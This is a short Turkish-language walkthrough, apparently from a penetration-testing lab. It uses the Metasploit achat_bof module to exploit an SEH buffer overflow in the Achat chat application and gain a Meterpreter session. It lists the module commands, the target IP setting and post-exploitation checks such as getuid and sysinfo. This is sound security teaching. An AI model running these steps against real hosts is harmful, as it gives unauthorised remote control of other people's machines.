Achat uygulaması, anlık mesajlaşma ve veri transferi amaçları ile kullanılan bir uygulamadır. Bu uygulamadaki SEH tabanlı bellek taşması zafiyeti MSF achat_bof expoit modülü ile kötüye kullanılarak işletim sistemine Meterpreter bağlantısı elde edilebilir.
Metasploit üzerinde ilgili modülün seçenekleri aşağıdaki gibidir:
search achat
use exploit/windows/misc/achat_bof
show options
Seçenek olarak hedef IP adresinin ayarlanması yeterlidir.
set RHOST 192.168.100.120
show options
Seçenekler ayarlandıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında uygulamayı çalıştıran kullanıcı haklarıyla Meterpreter bağlantısının elde edildiği görülmektedir.
exploit
getuid
getpid
ps -u Zeynep
sysinfo